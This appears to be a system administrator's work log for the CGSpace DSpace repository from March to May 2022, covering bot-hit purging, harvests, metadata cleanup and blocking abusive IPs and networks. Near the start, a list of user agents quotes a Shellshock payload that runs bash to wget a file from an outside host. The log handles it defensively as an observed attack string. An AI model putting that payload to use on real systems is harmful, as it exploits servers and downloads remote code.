      • Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.x.x) Gecko/20041107 Firefox/x.x
      • +
      • ZoteroTranslationServer/WMF (mailto:noc@wikimedia.org)
      • +
      • FullStoryBot/1.0 (+https://www.fullstory.com)
      • +
      • Link Validity Check From: http://www.usgs.gov
      • +
      • OSPScraper (+https://www.opensyllabusproject.org)
      • +
      • () { :;}; /bin/bash -c "wget -O /tmp/bbb www.redel.net.br/1.php?id=3137382e37392e3138372e313832"
      • +
      +
    • +
    • I submitted a pull request to COUNTER-Robots with some of these
    • +
    +
  • +
  • I purged a bunch of hits from the stats using the check-spider-hits.sh script:
  • +
+
]$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
+Purging 6 hits from scalaj-http in statistics
+Purging 5 hits from lua-resty-http in statistics
+Purging 9 hits from AHC in statistics
+Purging 7 hits from acebookexternalhit in statistics
+Purging 1011 hits from axios\/[0-9] in statistics
+Purging 2216 hits from Faveeo\/[0-9] in statistics
+Purging 1164 hits from Moreover\/[0-9] in statistics
+Purging 740 hits from Exploratodo\/[0-9] in statistics
+Purging 585 hits from GroupHigh\/[0-9] in statistics
+Purging 438 hits from Crowsnest\/[0-9] in statistics
+Purging 1326 hits from nbertaupete95 in statistics
+Purging 182 hits from metha\/[0-9] in statistics
+Purging 68 hits from ZaloPC-win32-24v454 in statistics
+Purging 1644 hits from Firefox\/x\.x in statistics
+Purging 678 hits from ZoteroTranslationServer in statistics
+Purging 27 hits from FullStoryBot in statistics
+Purging 26 hits from Link Validity Check in statistics
+Purging 26 hits from OSPScraper in statistics
+Purging 1 hits from 3137382e37392e3138372e313832 in statistics
+Purging 2755 hits from Nutch-[0-9] in statistics
+
+Total number of bot hits purged: 12914
+
    +
  • I added a few from that list to the local overrides in our DSpace while I wait for feedback from the COUNTER-Robots project
  • +
+

2022-03-05

+
    +
  • Start AReS harvest
  • +
+

2022-03-10

+
    +
  • A few days ago Gaia sent me her notes on the fourth batch of TAC/ICW documents (items 701–980 in the spreadsheet) +
      +
    • I created a filter in LibreOffice and selected the IDs for items with the action “delete”, then I created a custom text facet in OpenRefine with this GREL:
    • +
    +
  • +
+
or(
+isNotNull(value.match('707')),
+isNotNull(value.match('709')),
+isNotNull(value.match('710')),
+isNotNull(value.match('711')),
+isNotNull(value.match('713')),
+isNotNull(value.match('717')),
+isNotNull(value.match('718')),
+...
+isNotNull(value.match('821'))
+)
+
    +
  • Then I flagged all matching records, exported a CSV to use with SAFBuilder, and imported them on DSpace Test:
  • +
+
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=fuu@ummm.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-03-10-tac-batch4-701to980.map
+

2022-03-12

+
    +
  • Update all containers and rebuild OpenRXV on linode20:
  • +
+
$ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
+$ docker-compose build
+
    +
  • Then run all system updates and reboot
  • +
  • Start a full harvest on AReS
  • +
+

2022-03-16

+
    +
  • Meeting with KM/KS group to start talking about the way forward for repositories and web publishing +
      +
    • We agreed to form a sub-group of the transition task team to put forward a recommendation for repository and web publishing
    • +
    +
  • +
+

2022-03-20

+
    +
  • Start a full harvest on AReS
  • +
+

2022-03-21

+
    +
  • Review a few submissions for Open Repositories 2022
  • +
  • Test one tentative DSpace 6.4 patch and give feedback on a few more that Hrafn missed
  • +
+

2022-03-22

+
    +
  • I accidentally dropped the PostgreSQL database on DSpace Test, forgetting that I had all the CGIAR CAS items there +
      +
    • I had been meaning to update my local database…
    • +
    +
  • +
  • I re-imported the CGIAR CAS documents to DSpace Test and generated the PDF thumbnails:
  • +
+
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=fuu@ma.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-03-22-tac-700.map
+$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace filter-media -p "ImageMagick PDF Thumbnail" -i 10568/118432
+
    +
  • On my local environment I decided to run the check-duplicates.py script one more time with all 700 items:
  • +
+
$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/TAC_ICW_GreenCovers/2022-03-22-tac-700.csv > /tmp/tac.csv
+$ ./ilri/check-duplicates.py -i /tmp/tac.csv -db dspacetest -u dspacetest -p 'dom@in34sniper' -o /tmp/2022-03-22-tac-duplicates.csv
+$ csvcut -c id,filename ~/Downloads/2022-01-21-CGSpace-TAC-ICW.csv > /tmp/tac-filenames.csv
+$ csvjoin -c id /tmp/2022-03-22-tac-duplicates.csv /tmp/tac-filenames.csv > /tmp/tac-final-duplicates.csv
+
    +
  • I sent the resulting 76 items to Gaia to check
  • +
  • UptimeRobot said that CGSpace was down +
      +
    • I looked and found many locks belonging to the REST API application:
    • +
    +
  • +
+
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi)' | sort | uniq -c | sort -n
+    301 dspaceWeb
+   2390 dspaceApi
+
    +
  • Looking at nginx’s logs, I found the top addresses making requests today:
  • +
+
# awk '{print $1}' /var/log/nginx/rest.log | sort | uniq -c | sort -h
+   1977 45.5.184.2
+   3167 70.32.90.172
+   4754 54.195.118.125
+   5411 205.186.128.185
+   6826 137.184.159.211
+
    +
  • 137.184.159.211 is on DigitalOcean using this user agent: GuzzleHttp/6.3.3 curl/7.81.0 PHP/7.4.28 +
      +
    • I blocked this IP in nginx and the load went down immediately
    • +
    +
  • +
  • 205.186.128.185 is on Media Temple, but it’s OK because it’s the CCAFS publications importer bot
  • +
  • 54.195.118.125 is on Amazon, but is also a CCAFS publications importer bot apparently (perhaps a test server)
  • +
  • 70.32.90.172 is on Media Temple and has no user agent
  • +
  • What is surprising to me is that we already have an nginx rule to return HTTP 403 for requests without a user agent +
      +
    • I verified it works as expected with an empty user agent:
    • +
    +
  • +
+
$ curl -H User-Agent:'' 'https://dspacetest.cgiar.org/rest/handle/10568/34799?expand=all' 
+Due to abuse we no longer permit requests without a user agent. Please specify a descriptive user agent, for example containing the word 'bot', if you are accessing the site programmatically. For more information see here: https://dspacetest.cgiar.org/page/about.
+
    +
  • I note that the nginx log shows ‘-’ for a request with an empty user agent, which would be indistinguishable from a request with a ‘-’, for example these were successful:
  • +
+
70.32.90.172 - - [22/Mar/2022:11:59:10 +0100] "GET /rest/handle/10568/34374?expand=all HTTP/1.0" 200 10671 "-" "-"
+70.32.90.172 - - [22/Mar/2022:11:59:14 +0100] "GET /rest/handle/10568/34795?expand=all HTTP/1.0" 200 11394 "-" "-"
+
    +
  • I can only assume that these requests used a literal ‘-’ so I will have to add an nginx rule to block those too
  • +
  • Otherwise, I see from my notes that 70.32.90.172 is the wle.cgiar.org REST API harvester… I should ask Macaroni Bros about that
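  • A quick way to verify whether a literal ‘-’ user agent slips through would be a curl test like this (a sketch, reusing the same test URL as above):

$ curl -s -o /dev/null -w '%{http_code}\n' -A '-' 'https://dspacetest.cgiar.org/rest/handle/10568/34799?expand=all'
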
  • +
+

2022-03-24

+
    +
  • Maria from ABC asked about a reporting discrepancy on AReS +
      +
    • I think it’s because the last harvest was over the weekend, and she was expecting to see items submitted this week
    • +
    +
  • +
  • Paola from ABC said they are decommissioning the server where many of their library PDFs are hosted +
      +
    • She asked if we can download them and upload them directly to CGSpace
    • +
    +
  • +
  • I re-created my local Artifactory container
  • +
  • I am doing a walkthrough of DSpace 7.3-SNAPSHOT to see how things are lately +
      +
    • One thing I realized is that OAI is no longer a standalone web application, it is part of the server app now: http://localhost:8080/server/oai/request?verb=Identify
    • +
    +
  • +
  • Deploy PostgreSQL 12 on CGSpace (linode18) but don’t switch over yet, because I see some users active +
      +
    • I did this on DSpace Test in 2022-02 so I just followed the same procedure
    • +
    • After that I ran all system updates and rebooted the server
    • +
    +
  • +
+

2022-03-25

+
    +
  • Looking at the PostgreSQL database size on CGSpace after the update yesterday:
  • +
+

PostgreSQL database size day

+
    +
  • The space saving in indexes of recent PostgreSQL releases is awesome!
  • +
  • Import a DSpace 6.x database dump from production into my local DSpace 7 database +
      +
    • I still see the same errors I saw in 2021-04 when testing DSpace 7.0 beta 5
    • +
    • I had to delete some old migrations, as well as all Atmire ones first:
    • +
    +
  • +
+
localhost/dspace7= ☘ DELETE FROM schema_version WHERE version IN ('5.0.2017.09.25', '6.0.2017.01.30', '6.0.2017.09.25');
+localhost/dspace7= ☘ DELETE FROM schema_version WHERE description LIKE '%Atmire%' OR description LIKE '%CUA%' OR description LIKE '%cua%';
+
+

2022-03-26

+ +

2022-03-28

+
    +
  • Create another test account for Rafael from Bioversity-CIAT to submit some items to DSpace Test:
  • +
+
$ dspace user -a -m tip-submit@cgiar.org -g CIAT -s Submit -p 'fuuuuuuuu'
+
    +
  • I added the account to the Alliance Admins group, which should allow him to submit to any Alliance collection +
      +
    • According to my notes from 2020-10 the account must be in the admin group in order to submit via the REST API
    • +
    +
  • +
  • Abenet and I noticed 1,735 items in CTA’s community that have the title “delete” +
      +
    • We asked Peter and he said we should delete them
    • +
    • I exported the CTA community metadata and used OpenRefine to filter all items with the “delete” title, then used the “expunge” bulkedit action to remove them
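    • The bulk edit looks roughly like this (a sketch: the id and collection values are placeholders, bulk deletion has to be allowed in the DSpace configuration, and the CSV is just the filtered export with an added action column):

$ head -n2 /tmp/cta-delete.csv
id,collection,action
b1946ac9-2a69-4f05-9c5b-aaaaaaaaaaaa,10568/XXXXX,expunge
$ dspace metadata-import -f /tmp/cta-delete.csv -e user@example.com -s
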
    • +
    +
  • +
  • I realized I forgot to clean up the old Let’s Encrypt certbot stuff after upgrading CGSpace (linode18) to Ubuntu 20.04 a few weeks ago +
      +
    • I also removed the pre-Ubuntu 20.04 Let’s Encrypt stuff from the Ansible infrastructure playbooks
    • +
    +
  • +
+

2022-03-29

+
    +
  • Gaia sent me her notes on the final review of duplicates of all TAC/ICW documents +
      +
    • I created a filter in LibreOffice and selected the IDs for items with the action “delete”, then I created a custom text facet in OpenRefine with this GREL:
    • +
    +
  • +
+
or(
+isNotNull(value.match('33')),
+isNotNull(value.match('179')),
+isNotNull(value.match('452')),
+isNotNull(value.match('489')),
+isNotNull(value.match('541')),
+isNotNull(value.match('568')),
+isNotNull(value.match('646')),
+isNotNull(value.match('889'))
+)
+
    +
  • Then I flagged all matching records, exported a CSV to use with SAFBuilder, and imported the 692 items on CGSpace, and generated the thumbnails:
  • +
+
$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
+$ dspace import --add --eperson=umm@fuuu.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-03-29-cgiar-tac.map
+$ chrt -b 0 dspace filter-media -p "ImageMagick PDF Thumbnail" -i 10947/50
+
    +
  • After that I did some normalization on the cg.subject.system metadata and extracted a few dozen countries to the country field
  • +
  • Start a harvest on AReS
  • +
+

2022-03-30

+
    +
  • Yesterday Rafael from CIAT asked me to re-create his approver account on DSpace Test as well
  • +
+
$ dspace user -a -m tip-approve@cgiar.org -g Rafael -s Rodriguez -p 'fuuuu'
+
    +
  • I started looking into the request regarding the CIAT Library PDFs +
      +
    • There are over 4,000 links to PDFs hosted on that server in CGSpace metadata
    • +
    • The links seem to be down though! I emailed Paola to ask
    • +
    +
  • +
+

2022-03-31

+
    +
  • Switch DSpace Test (linode26) back to CMS GC so I can do some monitoring and evaluation of GC before switching to G1GC
  • +
  • I will do the following for CMS and G1GC on DSpace Test: +
      +
    • Wait for startup
    • +
    • Reload home page
    • +
    • Log in
    • +
    • Do a search for “livestock”
    • +
    • Click AGROVOC facet for livestock
    • +
    • dspace index-discovery -b
    • +
    • dspace-statistics-api index
    • +
    +
  • +
  • With CMS the Discovery Index took:
  • +
+
real    379m19.245s
+user    267m17.704s
+sys     4m2.937s
+
    +
  • Leroy from CIAT said that the CIAT Library server has security issues so was limited to internal traffic +
      +
    • I extracted a list of URLs from CGSpace to send him:
    • +
    +
  • +
+
localhost/dspacetest= ☘ \COPY (SELECT DISTINCT(text_value) FROM metadatavalue WHERE metadata_field_id=219 AND text_value ~ 'https?://ciat-library') to /tmp/2022-03-31-ciat-library-urls.csv WITH CSV HEADER;
+COPY 4552
+
    +
  • I did some checks and cleanups in OpenRefine because there are some values with “#page” etc +
      +
    • Once I sorted them there were only ~2,700, which means there are going to be almost two thousand items with duplicate PDFs
    • +
    • I suggested that we might want to handle those cases specially and extract the chapters or whatever page range since they are probably books
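    • A rough way to reproduce that deduplicated count is to strip the #page anchors from the exported URL list, for example (a sketch):

$ sed 1d /tmp/2022-03-31-ciat-library-urls.csv | sed -e 's/#.*$//' | sort -u | wc -l
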
    • +
    +
  • +

April, 2022


2022-04-01

+
    +
  • I did G1GC tests on DSpace Test (linode26) to complement the CMS tests I did yesterday +
      +
    • The Discovery indexing took this long:
    • +
    +
  • +
+
real    334m33.625s
+user    227m51.331s
+sys     3m43.037s
+

2022-04-04

+
    +
  • Start a full harvest on AReS
  • +
  • Help Marianne with submit/approve access on a new collection on CGSpace
  • +
  • Go back in Gaia’s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc)
  • +
  • Looking at the Solr statistics for 2022-03 on CGSpace +
      +
    • I see 54.229.218.204 on Amazon AWS made 49,000 requests, some of which with this user agent: Apache-HttpClient/4.5.9 (Java/1.8.0_322), and many others with a normal browser agent, so that’s fishy!
    • +
    • The DSpace agent pattern http.?agent seems to have caught the first ones, but I’ll purge the IP ones
    • +
    • I see 40.77.167.80 is Bing or MSN Bot, but using a normal browser user agent, and if I search Solr for dns:*msnbot* AND dns:*.msn.com. I see over 100,000, which is a problem I noticed a few months ago too…
    • +
    • I extracted the MSN Bot IPs from Solr using an IP facet, then used the check-spider-ip-hits.sh script to purge them
    • +
    +
  • +
+

2022-04-10

+
    +
  • Start a full harvest on AReS
  • +
+

2022-04-13

+
    +
  • UptimeRobot mailed to say that CGSpace was down +
      +
    • I looked and found the load at 44…
    • +
    +
  • +
  • There seem to be a lot of locks from the XMLUI:
  • +
+
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi)' | sort | uniq -c | sort -n
+   3173 dspaceWeb
+
    +
  • Looking at the top IPs in nginx’s access log one IP in particular stands out:
  • +
+
    941 66.249.66.222
+   1224 95.108.213.28
+   2074 157.90.209.76
+   3064 66.249.66.221
+  95743 185.192.69.15
+
    +
  • 185.192.69.15 is in the UK
  • +
  • I added a block for that IP in nginx and the load went down…
  • +
+

2022-04-16

+
    +
  • Start harvest on AReS
  • +
+

2022-04-18

+
    +
  • I woke up to several notices from UptimeRobot that CGSpace had gone down and up in the night (of course I’m on holiday out of the country for Easter) +
      +
    • I see there are many locks in use from the XMLUI:
    • +
    +
  • +
+
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi)' | sort | uniq -c
+   8932 dspaceWeb
+
    +
  • Looking at the top IPs making requests it seems they are Yandex, bingbot, and Googlebot:
  • +
+
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | awk '{print $1}' | sort | uniq -c | sort -h
+    752 69.162.124.231
+    759 66.249.64.213
+    864 66.249.66.222
+    905 2a01:4f8:221:f::2
+   1013 84.33.2.97
+   1201 157.55.39.159
+   1204 157.55.39.144
+   1209 157.55.39.102
+   1217 157.55.39.161
+   1252 207.46.13.177
+   1274 157.55.39.162
+   2553 66.249.66.221
+   2941 95.108.213.28
+
    +
  • One IP is using a strange user agent though:
  • +
+
84.33.2.97 - - [18/Apr/2022:00:20:38 +0200] "GET /bitstream/handle/10568/109581/Banana_Blomme%20_2020.pdf.jpg HTTP/1.1" 404 10890 "-" "SomeRandomText"
+
    +
  • Overall, it seems we had 17,000 unique IPs connecting in the last nine hours (currently 9:14AM and log file rolled over at 00:00):
  • +
+
# cat /var/log/nginx/access.log | awk '{print $1}' | sort | uniq | wc -l
+17314
+
    +
  • That’s a lot of unique IPs, and I see some patterns of IPs in China making ten to twenty requests each +
      +
    • The ISPs I’ve seen so far are ChinaNet and China Unicom
    • +
    +
  • +
  • I extracted all the IPs from today and resolved them:
  • +
+
# cat /var/log/nginx/access.log | awk '{print $1}' | sort | uniq > /tmp/2022-04-18-ips.txt
+$ ./ilri/resolve-addresses-geoip2.py -i /tmp/2022-04-18-ips.txt -o /tmp/2022-04-18-ips.csv
+
    +
  • The top ASNs by IP are:
  • +
+
$ csvcut -c 2 /tmp/2022-04-18-ips.csv | sed 1d | sort | uniq -c | sort -n | tail -n 10 
+    102 GOOGLE
+    139 Maxihost LTDA
+    165 AMAZON-02
+    393 "China Mobile Communications Group Co., Ltd."
+    473 AMAZON-AES
+    616 China Mobile communications corporation
+    642 M247 Ltd
+   2336 HostRoyale Technologies Pvt Ltd
+   4556 Chinanet
+   5527 CHINA UNICOM China169 Backbone
+$ csvcut -c 4 /tmp/2022-04-18-ips.csv | sed 1d | sort | uniq -c | sort -n | tail -n 10
+    139 262287
+    165 16509
+    180 204287
+    393 9808
+    473 14618
+    615 56041
+    642 9009
+   2156 203020
+   4556 4134
+   5527 4837
+
    +
  • I spot checked a few IPs from each of these and they are definitely just making bullshit requests to Discovery and HTML sitemap etc
  • +
  • I will download the IP blocks for each ASN except Google and Amazon and ban them
  • +
+
$ wget https://asn.ipinfo.app/api/text/nginx/AS4837 https://asn.ipinfo.app/api/text/nginx/AS4134 https://asn.ipinfo.app/api/text/nginx/AS203020 https://asn.ipinfo.app/api/text/nginx/AS9009 https://asn.ipinfo.app/api/text/nginx/AS56041 https://asn.ipinfo.app/api/text/nginx/AS9808
+$ cat AS* | sed -e '/^$/d' -e '/^#/d' -e '/^{/d' -e 's/deny //' -e 's/;//' | sort | uniq | wc -l
+20296
+
    +
  • I extracted the IPv4 and IPv6 networks:
  • +
+
$ cat AS* | sed -e '/^$/d' -e '/^#/d' -e '/^{/d' -e 's/deny //' -e 's/;//' | grep ":" | sort > /tmp/ipv6-networks.txt
+$ cat AS* | sed -e '/^$/d' -e '/^#/d' -e '/^{/d' -e 's/deny //' -e 's/;//' | grep -v ":" | sort > /tmp/ipv4-networks.txt
+
    +
  • I suspect we need to aggregate these networks since they are so many and nftables doesn’t like it when they overlap:
  • +
+
$ wc -l /tmp/ipv4-networks.txt
+15464 /tmp/ipv4-networks.txt
+$ aggregate6 /tmp/ipv4-networks.txt | wc -l
+2781
+$ wc -l /tmp/ipv6-networks.txt             
+4833 /tmp/ipv6-networks.txt
+$ aggregate6 /tmp/ipv6-networks.txt | wc -l
+338
+
    +
  • I deployed these lists on CGSpace, ran all updates, and rebooted the server +
      +
    • This list is SURELY too broad because we will block legitimate users in China… but right now how can I discern?
    • +
    • Also, I need to purge the hits from these 14,000 IPs in Solr when I get time
    • +
    +
  • +
  • Looking back at the Munin graphs a few hours later I see this was indeed some kind of spike that was out of the ordinary:
  • +
+

Munin graphs (daily): PostgreSQL connections, DSpace sessions

+
    +
  • I used grepcidr with the aggregated network lists to extract IPs matching those networks from the nginx logs for the past day:
  • +
+
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | awk '{print $1}' | sort -u > /tmp/ips.log
+# while read -r network; do grepcidr $network /tmp/ips.log >> /tmp/ipv4-ips.txt; done < /tmp/ipv4-networks-aggregated.txt
+# while read -r network; do grepcidr $network /tmp/ips.log >> /tmp/ipv6-ips.txt; done < /tmp/ipv6-networks-aggregated.txt
+# wc -l /tmp/ipv4-ips.txt  
+15313 /tmp/ipv4-ips.txt
+# wc -l /tmp/ipv6-ips.txt 
+19 /tmp/ipv6-ips.txt
+
    +
  • Then I purged them from Solr using the check-spider-ip-hits.sh:
  • +
+
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ipv4-ips.txt -p
+

2022-04-23

+
    +
  • A handful of spider user agents that I identified were merged into COUNTER-Robots so I updated the ILRI override in our DSpace and regenerated the example file that contains most patterns +
      +
    • I updated CGSpace, then ran all system updates and rebooted the host
    • +
    • I also ran dspace cleanup -v to prune the database
    • +
    +
  • +
+

2022-04-24

+
    +
  • Start a harvest on AReS
  • +
+

2022-04-25

+
    +
  • Looking at the countries on AReS I decided to collect a list to remind Jacquie at WorldFish again about how many incorrect ones they have +
      +
    • There are about sixty incorrect ones, some of which I can correct via the value mappings on AReS, but most I can’t
    • +
    • I set up value mappings for seventeen countries, then sent another sixty or so to Jacquie and Salem to hopefully delete
    • +
    +
  • +
  • I notice we have over 1,000 items with region Africa South of Sahara +
      +
    • I am surprised to see these because we did a mass migration to Sub-Saharan Africa in 2020-10 when we aligned to UN M.49
    • +
    • Oh! It seems I used a capital O in Of!
    • +
    • This is curious, I see we missed East Asia and Northern America, because those are still in our list, but UN M.49 uses Eastern Asia and Northern America… I will have to raise that with Peter and Abenet later
    • +
    • For now I will just re-run my fixes:
    • +
    +
  • +
+
$ cat /tmp/regions.csv
+cg.coverage.region,correct
+East Africa,Eastern Africa
+West Africa,Western Africa
+Southeast Asia,South-eastern Asia
+South Asia,Southern Asia
+Africa South of Sahara,Sub-Saharan Africa
+North Africa,Northern Africa
+West Asia,Western Asia
+$ ./ilri/fix-metadata-values.py -i /tmp/regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -m 227 -t correct
+
    +
  • Then I started a new harvest on AReS
  • +
+

2022-04-27

+
    +
  • I woke up to many up down notices for CGSpace from UptimeRobot +
      +
    • The server has load 111.0… sigh.
    • +
    +
  • +
  • According to Grafana it seems to have started at 4:00 AM
  • +
+

Grafana load

+
    +
  • There are a metric fuck ton of database locks from the XMLUI:
  • +
+
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi)' | sort | uniq -c
+    128 dspaceApi
+  16890 dspaceWeb
+
    +
  • As for the server logs, I don’t see many IPs connecting today:
  • +
+
# cat /var/log/nginx/access.log | awk '{print $1}' | sort | uniq | wc -l
+2924
+
    +
  • But there appear to be some IPs making many requests:
  • +
+
# cat /var/log/nginx/access.log | awk '{print $1}' | sort | uniq -c | sort -h
+...
+    345 207.46.13.53
+    646 66.249.66.222
+    678 54.90.79.112
+   1529 136.243.148.249
+   1797 54.175.8.110
+   2304 174.129.118.171
+   2523 66.249.66.221
+   2632 52.73.204.196
+   2667 54.174.240.122
+   5206 35.172.193.232
+   5646 35.153.131.101
+   6373 3.85.92.145
+   7383 34.227.10.4
+   8330 100.24.63.172
+   8342 34.236.36.176
+   8369 44.200.190.111
+   8371 3.238.116.153
+   8391 18.232.101.158
+   8631 3.239.81.247
+   8634 54.82.125.225
+
    +
  • 54.82.125.225, 3.239.81.247, 18.232.101.158, 3.238.116.153, 44.200.190.111, 34.236.36.176, 100.24.63.172, 3.85.92.145, 35.153.131.101, 35.172.193.232, 54.174.240.122, 52.73.204.196, 174.129.118.171, 54.175.8.110, and 54.90.79.112 are all on Amazon and using this normal-looking user agent:
  • +
+
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.3
+
    +
  • None of these hosts are re-using their DSpace session ID so they are definitely not normal browsers as they are claiming:
  • +
+
$ grep 54.82.125.225 dspace.log.2022-04-27 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
+5760
+$ grep 3.239.81.247 dspace.log.2022-04-27 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
+6053
+$ grep 18.232.101.158 dspace.log.2022-04-27 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
+5841
+$ grep 3.238.116.153 dspace.log.2022-04-27 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
+5887
+$ grep 44.200.190.111 dspace.log.2022-04-27 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
+5899
+...
+
    +
  • And we can see a massive spike in sessions in Munin:
  • +
+

Grafana load

+
    +
  • I see the following IPs using that user agent today:
  • +
+
# grep 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36' /var/log/nginx/access.log | awk '{print $1}' | sort | uniq -c | sort -h
+    678 54.90.79.112
+   1797 54.175.8.110
+   2697 174.129.118.171
+   2765 52.73.204.196
+   3072 54.174.240.122
+   5206 35.172.193.232
+   5646 35.153.131.101
+   6783 3.85.92.145
+   7763 34.227.10.4
+   8738 100.24.63.172
+   8748 34.236.36.176
+   8787 3.238.116.153
+   8794 18.232.101.158
+   8806 44.200.190.111
+   9021 54.82.125.225
+   9027 3.239.81.247
+
    +
  • I added those IPs to the firewall and then purged their hits from Solr:
  • +
+
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
+Purging 6024 hits from 100.24.63.172 in statistics
+Purging 1719 hits from 174.129.118.171 in statistics
+Purging 5972 hits from 18.232.101.158 in statistics
+Purging 6053 hits from 3.238.116.153 in statistics
+Purging 6228 hits from 3.239.81.247 in statistics
+Purging 5305 hits from 34.227.10.4 in statistics
+Purging 6002 hits from 34.236.36.176 in statistics
+Purging 3908 hits from 35.153.131.101 in statistics
+Purging 3692 hits from 35.172.193.232 in statistics
+Purging 4525 hits from 3.85.92.145 in statistics
+Purging 6048 hits from 44.200.190.111 in statistics
+Purging 1942 hits from 52.73.204.196 in statistics
+Purging 1944 hits from 54.174.240.122 in statistics
+Purging 1264 hits from 54.175.8.110 in statistics
+Purging 6117 hits from 54.82.125.225 in statistics
+Purging 486 hits from 54.90.79.112 in statistics
+
+Total number of bot hits purged: 67229
+
    +
  • Then I created a CSV with these IPs and reported them to AbuseIPDB.com:
  • +
+
$ cat /tmp/ips.csv
+IP,Categories,ReportDate,Comment
+100.24.63.172,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+174.129.118.171,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+18.232.101.158,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+3.238.116.153,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+3.239.81.247,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+34.227.10.4,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+34.236.36.176,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+35.153.131.101,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+35.172.193.232,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+3.85.92.145,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+44.200.190.111,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+52.73.204.196,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+54.174.240.122,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+54.175.8.110,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+54.82.125.225,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+54.90.79.112,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+
    +
  • An hour or so later two more IPs on Amazon started making requests with that user agent too: +
      +
    • 3.82.22.114
    • +
    • 18.234.122.84
    • +
    +
  • +
  • Load on the server went back up, sigh
  • +
  • I added those IPs to the firewall drop list and purged their hits from Solr as well:
  • +
+
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
+Purging 2839 hits from 3.82.22.114 in statistics
+Purging 592 hits from 18.234.122.84 in statistics
+
+Total number of bot hits purged: 3431
+
    +
  • Oh god, there are more coming +
      +
    • 3.81.21.251
    • +
    • 54.162.92.93
    • +
    • 54.226.171.89
    • +
    +
  • +
+

2022-04-28

diff --git a/docs/2022-05/index.html b/docs/2022-05/index.html
new file mode 100644

May, 2022

+ +
+

2022-05-04

+
    +
  • I found a few more IPs making requests using the shady Chrome 44 user agent in the last few days so I will add them to the block list too: +
      +
    • 18.207.136.176
    • +
    • 185.189.36.248
    • +
    • 50.118.223.78
    • +
    • 52.70.76.123
    • +
    • 3.236.10.11
    • +
    +
  • +
  • Looking at the Solr statistics for 2022-04 +
      +
    • 52.191.137.59 is Microsoft, but they are using a normal user agent and making tens of thousands of requests
    • +
    • 64.39.98.62 is owned by Qualys, and all their requests are probing for /etc/passwd etc
    • +
    • 185.192.69.15 is in the Netherlands and is using a normal user agent, but making excessive automated HTTP requests to paths forbidden in robots.txt
    • +
    • 157.55.39.159 is owned by Microsoft and identifies as bingbot so I don’t know why its requests were logged in Solr
    • +
    • 52.233.67.176 is owned by Microsoft and uses a normal user agent, but making excessive automated HTTP requests
    • +
    • 157.55.39.144 is owned by Microsoft and uses a normal user agent, but making excessive automated HTTP requests
    • +
    • 207.46.13.177 is owned by Microsoft and identifies as bingbot so I don’t know why its requests were logged in Solr
    • +
    • If I query Solr for time:2022-04* AND dns:*msnbot* AND dns:*.msn.com. I see a handful of IPs that made 41,000 requests (an example of this query with curl is just after this list)
    • +
    +
  • +
  • I purged 93,974 hits from these IPs using my check-spider-ip-hits.sh script
  • +
+
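    +
  • For reference, the dns query above can be run with curl against the statistics core and faceted by IP, roughly like this (assuming the default core name and port):
  • +
+
$ curl -s 'http://localhost:8983/solr/statistics/select' \
+    --data-urlencode 'q=time:2022-04* AND dns:*msnbot* AND dns:*.msn.com.' \
+    --data-urlencode 'rows=0' \
+    --data-urlencode 'facet=true' \
+    --data-urlencode 'facet.field=ip'
+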
    +
